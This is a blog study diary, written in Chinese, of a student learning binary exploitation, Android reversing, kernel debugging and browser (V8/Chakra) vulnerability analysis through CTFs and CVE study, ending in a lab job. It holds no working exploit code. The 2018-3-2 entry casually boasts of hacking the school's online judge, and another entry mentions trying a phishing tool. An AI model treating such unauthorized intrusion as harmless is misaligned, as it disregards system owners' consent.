Sakuraのblog

Sakuraのdiary

2099-09-18T14:05:42.000Z

建了一个知识星球：天问之路

如果想学习二进制安全，或者和我交流，欢迎来这里找我w

2018-2019

2018-1-28

1.看玄武实验室的每日安全推送（主要是看了android挖矿，p2p蠕虫）
2.配置shadow
尝试用gdb和gdbserver来调试
https://github.com/CENSUS/shadow
https://developer.android.com/ndk/downloads/index.html?hl=zh-cn
http://kiya.studio/2017/06/21/android-gdb/
shadow文档的几个坑点

arm-linux-androideabi-gdb，也就是gdb-arm版没有提供，要自己找，我装了一个ndk r10e，然后弄了一个，嗯，r11移除了gdb。
在gdb remote之前，文档里没有写forward转发，导致我试的时候一直refuse

3.晚上最大的收获是看到了一个不错的blog（android逆向CTF）
http://kiya.studio/2333/03/03/android-reversing-skills/#more

2018-1-29

看玄武的每日安全推送，主要看了WinAFL
nexus5被我刷成砖……然后顺手把刷机、root和装xposed全都整理了一遍。
webkit的poc断点找到了，可以调了
做了一道阿里CTF第二题，一道关于反调试的题。

2018-1-31

看AI直播调webkit，感觉调浏览器好难呀。
看玄武的每日安全推送，主要关注了反调试和使用Strava 热力图来推断军事基地位置，很有趣的思路。
研究了一下加固原理和脱壳基础：dvmDexFileOpenPartial，还挺简单的。
研究了ptrace和调试器原理，了解了ptrace反调试的一些技巧

2018-2-1

本来想今天研究一下ndk编译的，不过睡着了……然后也没看什么东西
帮学弟解决了一些搭建博客的bug，顺便自己把博客的主题配色，代码高亮，搜索，评论什么的都修改或添加了，好看多了……

2018-2-2

看玄武的每日安全推送
钓鱼网站那个很有趣，我就测试了一下，然后因为ss代理不走终端，找了一篇文章和另一篇文章，配置了一下就好了~
自己实践了一下那个钓鱼工具，实践文章和终端那个都可以在”杂项”分类里找到
研究了一下怎么用ndk-build编译一个能在手机上运行的c程序，这样明天就可以尝试hook了

2018-2-3

今天没有玄武的推送看~
研究了android native层hook，算是学到不少东西了。

2018-2-4

写了第一个xposed程序~遇到了一些坑，不过还是趟过去了。
修改nexus5的boot.img,打开系统调试，又坑了我一会。。

2018-2-5

今天出去怠惰了（茶）
xposed继续学习了一下，学会了一些姿势，感觉还是不错的~

2018-2-6

研究了怎么搭建shadowsocks服务端和优化
自己写了一个基于flask的B/S端口扫描器，代码太难看就不放了（茶

2018-2-7

继续看玄武每日推送2.6和2.7
wordpress DOS有点意思，不过没搞懂，另外主要看了android安全公告2月版，看懂了一些（限于原理），开发太菜了。
学习了android的jni开发，基本的都摸了一遍。

2018-2-8

继续昨天的jni学习，摸清了native方法的动态注册
研究了下.init_array,结合jni动态注册，做了一道CTF题
继续看玄武每日推送2.8,这篇钓鱼的有趣
给AI写了个爬页面上文件的爬虫。

2018-2-9

研究android构建过程，Gradle工作流程
读玄武每日推送（存了个移动端静态分析的github准备好好看看）

2018-2-10

研究Dex文件格式和修复
学习了用ddms来dump出运行内存做题的技巧。
学习了新建android工程，调so文件解题。

2018-2-11

把昨天看到一道递归算法的android re做了，感觉现在做一般的CTF都有点思路了，做看雪的还是GG，还要提高姿势水平。
今天上午看到我在知乎的提问有师傅回答我了：https://www.zhihu.com/question/266901100/answer/316607339，然后作死的又打开了这个洞CVE-2015-3864，嗯...我调没调出来，忙活了一上午，断点都没断下来，但是起码……嗯，我记住了名字！libstagefright，我是记住了……别等我学会了来找你。。
今天下午做完题就又瞎看了一会，思考我是不是选错了方向……android的调试贼麻烦，资料还贼少，看了看看雪，主要是浏览器、文件格式和内核，虽然其实都一样的，那些资料也不多，没法挖洞的……认识的dalao又少，没法充分交流QAQ，唉，感觉我是不是不适合当黑客，看vulcan的师傅微博，月月一大批CVE，就我什么都挖不到，不过今晚看了看师傅们的博客，他们的心路历程给了我很大勇气，是的，我早就不打算退后了，只有前进而已。

2018-2-12

今天刷空间看到moctf比赛，就参加了下，把android/linux re做掉就没看了。
依然很迷茫，不过其实想想，我开始学二进制，其实也就不到半年，进步速度并不是不能接受，只是在技能进阶上卡住了又没人交流而已，嗯，再想想好了。

2018-2-13到19

这些天几乎都过年去了……然后唯一做了点事就是把自己的课程设计做了，PortScan
新年新气象，最近家里的事情也是乱七八糟，能多学点赚钱的技术分担压力就好了。
下学期的计划——fuzz、CVE漏洞研究、前端后端的一些Web开发（写点相关项目练手），然后找实习。
学会了一项新的运动，保龄球，很有意思。
最近一直什么都没学，自己也在反思一些东西，寻找一个前进的点。
比如浏览器，文件格式，还是内核，或者其他，还是都不是。
安全只是个抽象的概念，具体化了才能变成业务。
我还需要探究一段时间，读很多的漏洞分析文章，追随前辈们走过的路途，再进一步反思。
“一个漏洞的产生到漏洞利用至少会经历好几个阶段：Bug –> exploitable bug(vulnerability) –> poc –> exploit –> reliable/weaponized exploit。虽然大家都喜欢把fuzzing出来的bug讲成blah-blah-blah的故事或者作为PR，但我们真正关心的漏洞应该是能到最后两个阶段的vulnerability。”

2018-2-20到21

返校真是艰难……飞机火车客车出租全都转了一遍才到……
晚上收拾了下房间，看了看看雪，发现师傅做的有趣CTF题，https://bbs.pediy.com/thread-224686.htm
群里在讨论内存管理和hook，被推荐了一本腾讯的手游安全的书《游戏安全：手游安全技术入门》，还不错，可以入个门……
看到一个博客提供了一些自定义ROM的资料，最近也想改，看到了就记录一下。https://my.oschina.net/ibuwai/blog?catalog=3379629&temp=1519222237338

2018-2-22

看了《手游安全技术那本书》，学习了注入技术。
下午买了考虫的口语能力提升班，然后学习了下
晚上在seebug逛，找各种二进制漏洞分析的资料，然后看到了陈良的ppt,remet的github,韩子诺的文章，还有很多很多……CVE-2014-7911感觉可以调调，我得整理整理我搜的资料，然后按照原理->漏洞分析->exp去学习w

2018-2-23到25

是的，仔细算算，我已经编译AOSP编译了三天了，而且还没编译好……现在已经基本放弃在mac上编译了，我现在突然想,flanker大神之所以用ubuntu做主力机……是不是因为在mac上编译不出AOSP呀……(逃)
明天在旧电脑上装win/ubuntu的双系统，要不是因为这学期有win网络编程和c#开发……我就直接烧ubuntu进去了（撑脸
嗯，不用明天了，在今天的收尾……新学期的开始……我终于是守得云开见月明，把AOSP弄出来了！

2018-2-26

学习了stack pivot
学习了heap spray,堆喷
学习了虚表攻防
了解androidroot
Time-of-check Time-of-use (TOCTOU) Race Condition
今天还是认真的研究了一下之前没调出来的cve-2015-3864，因为这个漏洞有完整的利用链资料，非常的棒，虽然可能调不了什么的，但是理解这个利用过程也很有意义。
还是要感谢一下看雪师傅的文章，还加了好友0.0，感觉要是我一开始就是编译的AOSP去调试……可能寒假就调出来了2333，反正感觉今天还是很有收获的。

2018-2-27

一上午调了道64位rop，还没调出来..exm???是这题的错还是我的错…多看看别人的exp好了，以前还是做题不够，积累不够。
继续看stagefright好了，争取今天多少调一调。
好吧，没看进去，gp0的exp大致看懂了，不过metaphor的思路还是费解，可能我现在的理解力还是不够。
下午一直在整理之前看的ptmalloc的一些基本概念，虽然意义不是很大，但是理一理总是好的，还是要为ctf-wiki打call，里面写了非常多的干货，明天继续整理。

2018-2-28

体育课累死……密码学数学基础有趣。
今天把heap exploit的unlink整理了一下，虽然最后那个例子有点问题，我换了两个系统都没成功，但是原理还是理清了，真的是都快忘了……

2018-3-1

又混了篇看雪的优秀，感觉还是蛮有成就感的，自己发的文章都不是优秀就是精品。
今天有点怠惰呢，明天要继续努力。

2018-3-2

今天一天都在整理fastbin的一个内容（其实还玩了一会Web，黑掉学校OJ嘿嘿嘿）
这道赛题略难，然后跟团队练习赛的PragyanCTF，感觉这赛题像是file io啊。。谁出的题这么皮。。

2018-3-3

生日快乐~自己，去订了蛋糕，今天继续研究了一下那个fastbin的题，真的很难。。
把android kernel也编译了出来，这次真的是可以调了。。

2018-3-4

今天和实验室大一的聊了下，然后把我能知道的东西，方向什么的，都聊了一下。
9447 CTF 2015的fastbin是真的难……我还是不懂，算了算了，明天看点别的吧，这个todo。
今天和一个师傅聊了下IoT漏洞应该怎么挖，受益匪浅，但是转换为具体的硬实力还需要多看多学多调。

2018-3-5

今天把那道fastbin的题认真的理了理，其实也不是很难，然后又把pragyan ctf2018的两道pwn题做了一下，第一道还好，那个目录遍历没理解上，看了wp会了，第二道就有点迷，静态链接下的格式化字符串漏洞，没办法覆盖got表，看了一篇wp是覆盖malloc_hook，这不是我白天看的那道fastbin的套路么……真的是……然后打开栈执行，这……真是脑洞，又感觉自己很菜……
嗯w，文章又被看雪推送了，还是感觉蛮不错的……希望能认识更多人吧w，今天看了看玄武每日推送的目录，非常nice，准备找个时间把这段时间没看的都啃一下。

2018-3-6

上周的比赛，搞到今天总算是大致调完了，就只剩一个点不懂，也是实在搞不懂了，教主说的很有道理，只有把文章写成博客，发出去，才能检验你到底对这个东西的理解怎么样，事实上，也只有在学习中的我，才会如此详细的写wp吧。

2018-3-7-8

这两天把漏洞战争的环境大致搭了一下，从用windbg到看到符号，还是折腾了一下。

2018-3-9-10

调了一下漏洞战争堆的第一个binary，然后熟悉了一下工具使用，还是nice.
调了cve-2012-1876的poc，发现了一些书上没有提到的地方和一个错误，就不提勘误了…都出了这么久了…原理差不多懂了，很有趣。
今天有意想不到的收获，或者说机会吧，希望我能把握好，然后做好安全研究，成为一个优秀的黑客。
列一个CVE调试计划吧，目前进度1/10
浏览器
7 CVE-2012-1876,堆溢出（p2o ie9)
3 CVE-2011-0027,整数溢出漏洞 (p2o ie8)
6 CVE-2013-2551,整数溢出漏洞(p2o ie10)
4 CVE-2013-1347,UAF(ie)
android
7 CVE-2014-3153 anroid kernel提权

2018-3-11-12

这两天进度比较低迷，第一天直接莽上去调exp然后被打脸…今天把vupen的文章仔细读了一遍，把整个利用过程理解了一下。
说来有个有趣的点，p2o之后cve-2012-1876不是应该补了么，怎么在win8+ie10上还能利用，更有趣的是vupen明明用这个洞getshell了ie9，但是为什么keen在Study of Exploit Migitation in Modern Browsers这个ppt上说了bstr的分配不再能被利用，那vupen到底是怎么写的exp…
最近的计划（才怪…

编译的前端后端
kernel的漏洞
看diff写poc…

2018-3-13-14

密码学数学基础和算法这些课也就算了，晚上还有软件开发的课，各种文档什么的…能不能好好lu代码，把之前写的项目project答辩完了。
等到了想等的结果，收心认真学习了。
晚上把计算机系统素养里的部分内容（VM）又看了一下，十分有意义。
为了学编译原理，先自己lu一个c语言解释器了解个大概吧。

2018-3-15-17

这几天把write a c interpret看完了，大致了解了编译器前后端，当然肯定现在还是不会写的。
调cve-2012-7864,虽然称不上调通exp，但是大部分都调出来了，poc调的很顺利，在exp就处处踩坑。
说来好像webkit的dom的堆被分开了，以后就不会有那么多uaf了。

2018-3-18-20

日记还是要每天记……都忘了自己每天做了什么了……把c++的project做完了，做了两道pwn题。
看了一下LCTF2017的题目,large bin的unlink确实没练过，还有一道simpleVM改的题，都做做好了。

2018-3-21-25

lctf2017的题目里学到不少东西，另外关于堆利用的姿势实在是不足，此外无libc利用这个也要再学习一下。
这几天除了两个project写，还打了强网杯，感觉就是什么都不会吧。。可能不该死磕一道题，应该都看看？…啊啊啊，难受死了，离顶尖水平差的根本不是一点半点……
还看了一篇清华的论文，非常nice。http://jcs.iie.ac.cn/ch/reader/view_abstract.aspx?file_no=20180101&flag=1
还是有的挫败呢，离别人的水平。

2018-3-26

1.读玄武每日推送[http://chuansong.me/n/2253059751415].

mark一下windows kernel漏洞利用，mark一下k0师傅的UBUNTU 16.04 EBPF ARBITRARY READ/WRITE 漏洞分析和360src的这篇,看来调kernel还是有的调。
看到的ARM exp开发就很简略，感觉学不到什么东西。
mark一个超棒的linux kernel交互图，还能在页面上点击跳转到资料
还有一个Stack pivoting exploit的图收了,不知道他们怎么画的图这么好看。
windows注册表审计感觉以后用得到
p2o的沙盒逃逸漏洞这个感觉十分有意思。
blackhat上总有很多好议题，比如这个绕过ASLR的新思路

2.准备配linux kernel的调试环境，真的是……配不起来啊，双机调试，拉取符号文件，设置串口，改配置开启调试功能。rbq,rbq
3.加入了chamd5团队，有师傅一起学pwn，一起讨论真是太棒了QVQ

2018-3-27

上午和出强网杯kernel题的师傅聊了一下kernel的调试环境搭建和赛题，师傅人蛮好。。
搭建的话，muhe师傅的https://www.anquanke.com/post/id/85837

编译linux 注意去掉不必要的东西，然后编译busybox 然后插入内核写linux init 最后制作cpio
这样就可以qemu+gdb调试了，很nice。

下午和晚上忙各种杂七杂八的事情反正……不过总算还是把要复盘的赛题做完了。
另外，感觉自己的努力和天赋还是被人肯定的，加油吧，自己QVQ。

2018-3-28

人生这种东西，其实就是起起落落落落落落落落落落落落落落落落落落落落落落落落落落落落，23333
瞎看了半天linux inside，还看了下linux x86-64 asm，感觉没什么进展。
晚上在知乎提了个问题，别人指了一条很nice的路线给我，还和其他人get了一点点资料，感觉我应该也是可以搞的吧，嗯哼。
其实今天一直比较浮躁，还是昨天晚上的一些后遗症吧，还有就是期望和现实的落差……
不过冷静的回想一下，不能让自己立刻从舒适区脱离，从新掌握新的知识，那怎么进步呢？且行且努力（乖巧

2018-3-29

这几天事挺多的，今天才把blackhat的ppt都下载下来,然后看了下linux符号解析还发现了一个正在开发中的linux病毒
收集了蛮多linux kernel资料慢慢啃……今天啃了两个ppt，纯英文的那么多……我也是很意外自己读起来没什么障碍的……
学什么都要一步一步呀，能调通一个，调试就没什么了，后面的学习速度就看对于kernel和保护的理解了。

2018-3-30-31

这两天发生的事情还蛮多的，最近发生的一些事让我觉得，自己调的真洞还是太少，调就要调出来还要能调通，不过说实话吧……浏览器和kernel的洞真的不好调，我学二进制又不久……现在比赛练pwn都来不及，还要分身调洞，确实有点难啊……
不过kernel的ppt啃了俩，感觉纯英文的资料也就那个样子了，读起来还是挺流畅的，要是真的不懂换成中文我也不懂……
把kernel题的环境搭起来了，有师傅请教真的是比自己搞好太多……另外堆的题感觉有感觉了，准备给自己一个比较长的训练周期，比如十天，彻底脑内模拟透，最近进步还是蛮多，加油。
mark一个师傅的博客

2018-4-1-3

打了一场0ctf，感觉自己还是太菜，不过在师傅们的帮助下，把能搞懂的题都搞懂了，学到很多很多东西，还是很开心的。
写wp太麻烦了坦白说。。不过还是写吧，不写的话自己都不知道能记得多久……

2018-4-4-11

这几天电脑键盘坏了，电脑送修什么都没干。下了个吃鸡手游，嗯，还挺好玩的，今天早上电脑到了删了。
把0ctf2018的4道pwn复盘完了，折腾kernel调试环境。。还是挺麻烦的。
想要的很简单，得到却很难，好想去实验室做安全研究。

2018-4-12

今天从qemu+gdb，各种花式报错，到搭建内核的双机调试，简直了……总算最后是勉强在win机器上弄好了。
今天得到的一个启发是，先找一个可以用的方案去做，不要想什么一次做到最好，到有机会再换方案。
英语作业还没做……唉……赶作业赶作业……

2018-4-13

今天也是一堆事情，睡到中午然后开始做ddctf，那个逆向的mips还有android逆向的RSA，pwn的win kernel exploit真的是有、意思。反正我不想做了，不如学习一个新姿势
linux kernel调试的环境算是彻底搭好了，今天解决了两个昨天没解决的bug，已经可以看到源码了。

2018-4-14-15

解决了内核不能单步调试的问题，然后在复习信安数学了。。再不看要凉了
仔细跟了一下poc，感觉还是能看懂的。

2018-4-16-17

自己看了下日记，4月除了修电脑配环境，几乎什么都没做，这段时间心态太浮躁了，嗯，加个太，也要准备投几家实习了，本来以为可以拿到的offer，都感觉凉了，不过算了，我是要去实验室做安全研究的人呢。
分析了cve-2017-8890的漏洞成因和模型还有patch

2018-4-18

今天也是一堆的课，晚上和师傅们聊天聊八卦去了。。结果只把UAF对象的分配和释放调了调。
了解了一下实验室面试啥的，要好好调CVE了。

2018-4-19

看了看师傅们的面试题，觉得其实自己还能再抢救一下。。
今天看了长亭的kernel的洞，感觉分析成因还是很好分析的…但是exp调起来麻烦，也懒得写博客记录了，今天把webkit的调试记录了一下，明明好久之前就搞了，结果到现在还是这样没什么进展（茶

2018-4-20-21

编了一天v8，搞不出来，墙真讨厌。
调（看）了一个webkit的UAF漏洞，还行，感觉最难懂的还是对象之间的引用关系太复杂，还有就是回调函数跟着跟着容易找不到自己在哪。
“我是谁，谁在打我。”（逃）

2018-4-22-24

打了一场*ctf，又学到了新姿势。
在看v8，看JIT，看R大的回答，xjb搜文章，还是不错。
调通了p2o的一个v8的oob的洞，cve-2017-5053,还是不难。

2018-4-25-28

补一些浏览器的基础吧
学习了一下一个新的内核洞，有新的trick总结
最近觉得该搞搞利用了，路由器固件也可以玩一下，安全研究这么有趣，什么都能摸一下（才怪

2018-4-29-30

国赛打完了，各种不走心，状态奇差，混进赛区半决赛了，CTF也玩到这了吧先，后面好好研究浏览器。
看了Natalie Silvanovich写的How to Find JavaScript Vulnerabilities with Code Review

Determine intended functionality
Review implementation of important features
Review previously reported bugs
Brainstorm likely vulnerable areas
Review code!
Mozilla docs (MDN) is a great start for JS

想翻一些议题视频看的时候翻到了一个仓库，js vul的，存一下，js-vuln-db

2018-4-31-5.2

看了一个js optimized code视频，虽然是chakra的

不过感觉，有点没用…这些我都知道（
看v8的gc,利用和各种，反正还是挺迷的，先看吧QVQ
看到一幅很棒的图，新的v8的执行图？
看webkit技术内幕找灵感，看洞有点看不明白了。

2018-5-3

下午在看书，然后突然接了玄武的面试，患得患失吧，之前面试都没这种感觉。
总结一下面试：
CTF和内核这种充数的不算，好歹面的是浏览器组。
主要是讲了v8的一个洞，然后oob有一个点没分析清楚，我需要透彻的再搞一下了，还是太菜。
感谢给我讲了这个点的sky师傅，面的时候被问到这里真心紧张了。
面了45分钟，口干舌燥，最后我提问的时候，问了自己读浏览器源码的方法是否合适，万分期望能过。
也问了我对各种缓解机制的了解，然后就是漏洞利用，我讲的每一个洞，都被问了怎么利用，这个答的太差了，真的只是说说思路了，自己搞，写exp，真的没试过……该提升这方面的技能了，不能停滞不前！
CTF暂时不玩了，在拿到offer之前。

2018-5-4

webkit技术内幕里关于v8有一些描述，有一些帮助。
理解了一下原型链是什么。

2018-5-5-9

有点忘了自己都做了什么？最近做的东西周期越来越长，分开来看每天都没什么好记的（都是借口……最近太兴奋和激动有点摸鱼）
玄武实验室的offer拿到了~我最初想要的都有了，以后只需要往着安全研究员和优秀黑客的方向继续努力就行。
最近有在翻v8的一些日语资料，翻完了会放出来吧，一边看资料一边查资料读slide打基础，还有鲸书准备读。

2018-5-10

继续翻v8 exploit的资料，大概翻完了1/3，看到了GC机制那里。
下午上机组实验太伤脑子了……茶，然后最近准备再调一个v8的oob写wp了，不过还得等等…一样一样来。
c++有点不熟了呀，还是要再搞搞……

2018-5-11

继续翻v8资料，理解引擎很重要，在此基础上调洞比起靠感觉还是要好点的，纯靠感觉容易偏。
翻完了gc，好像稍微懂一点了。
今天其实发生了很多事情吧，不过不方便写在日记里，就这样吧。

2018-5-12

继续翻v8，总算翻到了对象存储（其实这部分该最先讲吧……）
准备信息系统开发的答辩什么的，下周开始要准备复习功课了。

2018-5-13-14

今天把v8的ppt的引擎基础部分翻完了，入职的事情也都搞的差不多了，剩下就是在去之前好好努力了。
感觉路由器这种硬件可以玩玩……相对好挖洞呢。。

2018-5-15-6-9

这段时间沉迷期末考试无法自拔？？？嘤嘤嘤
有个小插曲，因为弄错了考试时间导致挂科，吃一堑长一智。。。
好了，开始记笔记了。

2018-6-10-11

把v8 exploit的PPT翻译收了个尾，重新整理了下v8的学习思路。
从漏洞函数回溯调用路径，断点调试等，还有exp的常用思路。

2018-6-12-14

最近脚上起了个小疮去了两趟医院，走路还好疼，真的是非常不顺利了。

2018-6-15

在mac上编译了v8，之前是在win上编译的，不得不说……有个坑点就是在16.04上面，不checkout到旧的分支，是无法编译成功的，耽误了一天。
然后认真的研究了一下fast Properties和hidden class，拿gdb打debugprint看了很多东西学习，记笔记记笔记。

2018-6-16

翻译了Source to Binary Jounrney of V8 javascript engine
categories，get了新知识，v8的体系结构还要多调试理解。
另外，再需要啃一本鲸书，理解一下编译优化技术。

2018-6-17

积累着读了一点PPT
突然发现也已经看了和写了，还调试了不少东西了，慢慢的对v8从生疏到开始渐渐熟悉，不过到挖掘漏洞的方法论可能还要再过一段时间吧。
毕竟v8代码我都没咋读过，翻翻pipeline.cc了解下Turbofan的一些API

2018-6-18

学习了阅读v8的bytecode，和了解bytecode的生成和解释执行还有to graph的过程

2018-6-19

今天开始要复习一点算法呢。
学习了v8增加的gdb命令使用,读了
https://github.com/danbev/learning-v8/blob/master/README.md
真的难懂，看了一下午，没什么头绪。。

关于代码生成，Builtins和Runtime还是云里雾里，头疼。
写了个小工具来转换unsigned long long和double
v8的对象存储又看了一遍。。。结果今天还是没复习算法。。睡觉睡觉。

2018-6-20-21

搬家，寄了一些东西回家，整理了整理书，虽然我看的都是电子书，但是还是存了这么多呀。
三年不长，但也不短。

晚上收拾了我最后一点东西，把入职需要的材料办完，要走了呢。

2018-6-22-23

复习了几道动态规划的算法题，要考试啦。
另外最好的消息是迟到了。。只做了十分钟的计算机组成原理居然及格了。。感谢老师，师生情太深了，感动感动。
这段时间发生了不少事情，然后让我又想明白了一些事情，这段时间确实，没怎么学的进去，学的并不好。
今天看了蛮久的漏洞，不知道其他人是什么样，但是在我最烦最难受的时候，安全研究是最能让我平静下来的一件事情。
我喜欢这样，虽然目前很多地方做的并不好，但是可以慢慢学习~
写了个case CVE-2016-1646，还有另外一个JIT的洞，有点难懂。

2018-6-24-25

调v8一个麻烦就是编译，得想个办法.
http://eternalsakura13.com/2018/06/26/v8_environment/
总算是搞定了，最近一些技术文章读的少了，思路不够开阔，学习学习……
还有算法考试要到了。。趴桌，继续在看动态规划和贪婪

2018-6-26

学习了CVE-2016-5198，原理就是在JIT优化之后，会直接从n中取出直接取出自定义属性数组中，对应于某属性偏移的字段，而不做任何合法性校验。

都还需要总结（

2018-6-27-28

看了一些内核的资料，整理整理，顺便给人鸡汤了一下。。
刷算法，准备期末。。凉了啊。。

2018-6-29

累的要死的一天,飞机晚点了三个小时，卒……
看了一些资料，学会了如何成为一个合格的安全研究员（打了鸡血
在mathias这里住下了~New story要开始了

2018-6-30-7-2

这两天在忙着入职，装电脑和认识同事。
和导师说了自己最近在做什么，从tools和Bug study的角度，然后他让我继续搞v8，得偿所愿，不过估计要干活要明天了，说是要分析的洞还没给我。
[ Browser ] Microsoft Edge Chakra 引擎 UAF 漏洞分析 (CVE-2018-0946)：https://www.fortinet.com/blog/threat-research/an-analysis-of-the-use-after-free-bug-in-microsoft-edge-chakra-engine.html
https://bugs.chromium.org/p/project-zero/issues/detail?id=1534&desc=3
[ Browser ] CVE-2018-5146
http://blogs.360.cn/blog/how-to-kill-a-firefox/
A神之前就说在写一个没有poc的exp，不知道是不是这个洞，突然想到。
others（同事写的root cause和exploit，还有怎么用shadow来分析堆，很有意义。
看了鲸书1-4章，不少熟悉的名词……interesting

2018-7-3

刚入职这段时间确实是最宽松的一段时间了，只需要学习就行了，没有什么其他KPI，后面应该就多了。
今天分析CVE-2017-0234，不过主要花时间都花在环境搭建上，漏洞触发和分析并不难，或者说还好。

2018-7-4

今天把CVE-2017-0234的分析报告初版写完了，掌握了vs和windbg的两种很棒的调试方法，然后在编译v8，算是学到了一点东西，得再加强code review的能力。
成功在win上编译好了v8，可以玩一下。

2018-7-5

0234还要分析第二版，不过还不急，今天在自己分析其他v8的漏洞，一个p2o的洞的利用，思路真是棒，学到了学到了~
https://docs.google.com/document/d/1tHElG04AJR5OR2Ex-m_Jsmc8S5fAbRB3s4RmTG_PFnw/edit

2018-7-6

上班摸鱼好几天，今天下午听了各个大佬每周做的事情和科总的分享，觉得要走的路还很长。
目前的计划：
先看一些代码和语言标准；
talk和blog（可以看看如何移植v8，并思考其中可能出现的漏洞
Firefox的fuzz（编译原理不止要领会意义，更要能写出来。
另外是关于win下用到了v8的各种软件的调试，也是一个学习面（比如可以看看漏洞战争等资料学习windbg和常规利用）

你要用较少的时间走完别人走了很久的路，所以你要跑起来，要飞快地跑起来。

和导师聊过自己分析的第一版漏洞，发现很多问题，我需要更深入的思考。其实安全研究有点像一个侦探游戏，每一行都是线索，我漏掉一点东西就拼不出完整的拼图。（因缺思厅
PoC能否修改？怎么修改？思考如下：

不同的对象能否触发？举例：一定要是Uint32Array或者ArrayBuffer么?
是否一定用到循环？去掉循环行不行？怎么精简PoC?
为什么JIT优化去掉边界？它为什么会去掉边界？（和4GB有关，这种特殊的buffer分配方式）
（去掉边界的代码是三行，代表一个JIT生成的可选项，为什么要这么选？）

2018-7-7

今天上午去办了个房卡，一个月4000，押二付一，资产清零2333，其实居住条件就一般啦，只是离公司近，方便加班（摸鱼）
今天和朋友聚了个餐，以后就全吃公司救济粮了~
继续看0234，直接挂win API没调到点子上，但是最后还是换了个想法搜到了。。还行。。方向没错。
思考和调试新的攻击方法，趴桌。

2018-7-8

把0234第二版写好了（调试分析昨天已经结束了，今天只是整理文案……）
然后看c++对象模型，很有意思。
研究了一下js fuzzer
继续思考和调试某个洞（或者说软件）的新的攻击方法。

2018-7-9

下午就是在部署fuzz和抄代码,然后xx发了个webkit的洞，我看看……还有公司推送了一个dlmalloc的。。都看看
导师说我写的FUZZ是浪费时间2333，嗯，是这样的，我不用太心急，这就是有人带的好处……很多点能够及时纠正（然后一下午没了2333
沿着各个组件，各个组件都出过什么漏洞这个线索去分析好了，人的力量才是无穷大的。
嗯，先把思路和相关知识建立起来。

2018-7-10-11

在这找test看，https://cs.chromium.org/chromium/src/v8/test/mjsunit/es6/regress/
v8相关的索引，https://v8.paulfryzel.com/docs/master/index.html
看每天的commit，https://github.com/v8/v8/commits/master
看gpz的漏洞，每天写一篇分析（当然不可能放出来（逃
https://www.exploit-db.com/author/?order_by=date_published&order=desc&pg=1&a=7725
最近在思考一些个人研究是否要放博客上，仔细想了想还是算了，漏洞理解的思路，比很多东西要宝贵吧。

2018-7-12

现在想要挖到洞，想学会漏洞利用，顺便，月乃安利了一个repo,PPP的https://github.com/theori-io/pwnjs
这两天可能因为一些原因心情异常烦躁，一方面是弱的不行的自己，一方面是想要的更多，哇，真想哭……好了，杂事就不管了，我又不是神，怎么可能面面俱到。
闭关，博客会更新日记，在有一定系统化的总结思路之前，博客不会再更新文章了（日更变月更？）

2018-7-13

今天开了个组会，可以说是非常开心了……
每天东看瞎看，没看点有用的东西……（发呆

然后导师给了我下一版要继续分析清楚的点。

VritualAlloc分配的和GC管理的区别，GC机制
开发者为什么这么设计这个？为什么之前不限制4GB
（明明超过4GB就会OOB，为什么还去掉上界，他们就真的是觉得4GB足够大？其实不是；patch补的其实是没问题的，虽然依然可以dos，但是这个不是大问题，应该还是要从GC的角度去再思考一下，或者其他？）
这个内存管理是实现有问题还是设计有问题？实现有问题那么还有哪些地方是这么实现的，设计同理。要比开发者更了解他们所写的软件（：
安全研究的本质还是回归到对开发者的代码的深层次理解，一层一层的往下深挖，才能挖到线索，挖到真相（

太菜了太菜了……受不了我自己了……
今天的收获是和刘炜师傅指点了我好多，一些源码里的疑问搞的清楚了，还解决了其他问题，nice……每天学的都比较痛并快乐着了。

2018-7-14

一觉睡到下午一点半……23333，还好周末，不过平常起得也不早，还好在玄武，要不然要被开了……
然后晚上和川神还有夜影他们约了个饭，感觉还不错~(然后吃完了滚回来加班)
今天看了点chakra，分析了cve-2016-7189，用英文写了wp，明天再整理一下pattern（root cause比较好写，只是关于callback我调了一下，挺好玩的）
type confused还是很普遍的漏洞，但是其实还是不大好覆盖到每个点去看，有没有什么好思路呢（发呆

2018-7-15-18

这几天真的有点懵……或者说有点迷茫，开始搞chakra，代码还是那么难啃，不过比v8好搞多了……
关于开发者的假设最后还是弄清楚了，其实就还好，是我分析的时间间隔有点长，没直接串起来，一个宽度问题。
在想明白之前觉得自己要被开了，现在还好。
今天游走了一天，把zdi的博客上的一些分析看了，有点意思，但是还不够。
另外我又要继续分析了。
为什么VirtualAlloc比GC更不安全，GC机制。
导师让我找几个渲染引擎的老的UAF洞看看~（估计就16年的吧
感觉又要踩坑……
搭了一个VPN服务器，这样就不用担心v8拉取不下来了……
https://cloud.tencent.com/developer/article/1154896
人生苦短我用docker

2018-7-19-24

看了看雪峰会，sky师傅讲浏览器的议题很有意思。
看洞，整理一些loki的洞看。
准备开始JIT之旅
TODO List

中科大的编译原理课程，比较简单
http://mooc.study.163.com/course/1000002001?tid=1000003000#/info
http://staff.ustc.edu.cn/~bjhua/courses/compiler/2014/

斯坦福的CS143，编译基础
https://lagunita.stanford.edu/courses/Engineering/Compilers/Fall2014/about
斯坦福的CS243，编译优化
http://infolab.stanford.edu/~ullman/dragon/w06/w06.html

CMU，编译基础
http://www.cs.cmu.edu/~rjsimmon/15411-f15/
CMU，编译优化
http://www.cs.cmu.edu/afs/cs.cmu.edu/academic/class/15745-s16/www/

pizlo的PPT很nice
http://www.filpizlo.com/slides/pizlo-dls2017-vmil2017-jscvm-slides.pdf
开始0236……

2018-7-25-26

分析漏洞更深入了，思考的过程和思路慢慢搭起来了。
今天开始看编译原理。记录一些有趣的问题

perfect hashing
1. 什么是（关键字的）完美哈希？
没有关键字冲突的哈希函数
2. 如何构造完美哈希？试列举一到两种算法。
目前用的比较多的是gperf算法
为什么需要构造完美哈希？用关键字单链表是否f可以？
因为完美哈希一次匹配，的时间效率为O(1),而链表要扫描一遍，时间效率为O(N)

正则表达式代码生成工具
http://www.txt2re.com/
NFA->DFA,有限状态自动机

递归下降分析算法
LL(1),ANTIR

2018-7-27

总结一下今天，组会上分享的刚好是浏览器相关的东西，学到很多，此外最重要的是听了别人每周在干什么，也慢慢的知道了自己以后研究该看什么。
此外就是在看编译原理了，JIT始终是一个大的攻击面，而且写js/dom fuzz也绕不开编译原理，要吃掉这块始终不容易。。我还是太菜了。

2018-7-28-29

这两天看了realworld ctf,和继续学习编译原理,看的还算快。。
spectre的漏洞利用和同事聊了一下，还是没做出来这个题，等官方wp学习一下，说来长亭这个比赛很有意思了……
说来vm escape已经变成常规题了……23333，可以学习一个了…
代码量还是不够啊，等这段时间搞完，就大量抄和读了……（没什么自己的需求，就不自己写了）
积累积累积累

2018-7-30

